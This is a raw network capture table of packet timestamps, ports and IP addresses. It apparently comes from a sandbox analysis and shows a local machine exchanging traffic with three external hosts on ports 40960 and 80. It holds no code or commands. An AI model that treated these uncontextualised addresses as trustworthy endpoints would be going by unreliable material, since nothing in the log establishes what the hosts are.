Jun 24, 2024 00:10:19.758152962 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.758155107 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758162975 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758169889 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758177996 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758210897 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.758239031 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758253098 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758261919 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758291960 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758299112 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758306026 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758352041 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758359909 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758367062 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758434057 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758461952 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758470058 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758482933 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758490086 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758527040 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758534908 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758542061 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758567095 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758574963 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758582115 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758624077 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758630991 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758641958 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758660078 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758666992 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758675098 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758727074 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758733988 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758740902 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.758919954 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.777769089 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.782665014 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.782937050 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.783035040 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.783035040 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.783063889 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.788583994 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788606882 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788614035 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788620949 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788649082 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788690090 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788697004 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788701057 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788752079 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788759947 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788767099 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788786888 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788794994 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788801908 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.788999081 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.809005976 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:19.811398983 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.813816071 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:19.928916931 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.929410934 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.934184074 CEST	80	49723	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.934385061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:19.934434891 CEST	49723	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.934473038 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.956617117 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:19.962301016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.224953890 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:20.226267099 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:20.231120110 CEST	80	49718	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:20.231148005 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:20.231189966 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:20.231270075 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:20.237174034 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:20.241961002 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:20.636631966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.636723995 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.681976080 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.686726093 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.869786024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:20.869904041 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:20.900943995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.900958061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.900968075 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901015997 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.901060104 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901062965 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.901149035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901160002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901170969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901175976 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.901185036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901195049 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901204109 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.901230097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.901251078 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.901592970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901613951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.901648045 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.901674032 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.905872107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.905886889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:20.905961037 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:20.908901930 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:20.913726091 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.027359962 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.027374029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.027384996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.027395964 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.027427912 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.027494907 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.027827024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.027895927 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.027899027 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.027937889 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028165102 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028208017 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028244972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028269053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028290987 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028306007 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028331995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028342962 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028353930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028373957 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028404951 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028712988 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028758049 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028769016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028796911 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028825045 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.028829098 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028841019 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.028877974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.029479980 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.029491901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.029503107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.029545069 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.030318975 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.030491114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.030503035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.030514002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.030546904 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.030581951 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.030589104 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.030867100 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.034130096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.034204006 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.034216881 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.034229040 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.034240961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.034264088 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.034291029 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.097379923 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097404957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097417116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097486973 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.097501993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097513914 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097524881 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097537041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097575903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.097603083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097615004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.097642899 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.097680092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.098196030 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.098257065 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.098273993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.098413944 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.102319002 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.102674961 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.113966942 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.114108086 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.152585030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152631044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152651072 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.152657032 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152676105 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.152678013 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152734041 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.152765036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152779102 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.152796030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152843952 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.152931929 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152940989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152951002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152960062 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.152970076 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.152988911 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.153033018 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.153331995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.153388977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.153399944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.153439999 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.153460026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.153470039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.153479099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.153501987 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.153531075 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.154081106 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.154123068 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.154131889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.154140949 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.154167891 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.154221058 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.154231071 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.154241085 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.154251099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.154266119 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.154292107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.154953003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155005932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.155008078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155018091 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155052900 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.155090094 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155100107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155107975 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155117035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155126095 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.155240059 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.155867100 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155915976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155925035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155957937 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.155963898 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155973911 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155982971 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.155993938 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.156032085 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.156071901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156209946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.156725883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156784058 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.156791925 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156800985 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156847000 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.156888962 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156898975 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156908989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156919003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.156928062 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.156969070 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.157555103 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.157607079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.157608986 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.157615900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.157648087 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.193134069 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193169117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193180084 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193237066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193234921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.193234921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.193248987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193321943 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.193321943 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.193481922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193525076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193527937 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.193696022 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193741083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193747044 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.193753958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193799019 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.193830967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193841934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.193895102 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.194608927 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.194670916 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.194680929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.194681883 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.194709063 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.194720984 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.194722891 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.194747925 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.194787979 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.195574045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.195593119 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.195602894 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.195636034 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.195662022 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.195667028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.195681095 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.195732117 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.200995922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.201014996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.201075077 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.201086044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.201245070 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.278492928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278564930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278577089 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278636932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.278695107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.278858900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278882980 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278892040 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278928041 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.278944016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278954983 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.278965950 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.278987885 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279005051 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279036999 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279203892 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279248953 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279272079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279314995 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279351950 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279392958 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279397011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279408932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279433966 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279455900 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279597998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279650927 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279666901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279683113 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279690981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279741049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279761076 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279802084 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279814005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279824018 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279863119 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279890060 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.279933929 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.279966116 CEST	80	49725	77.91.77.81	192.168.2.5
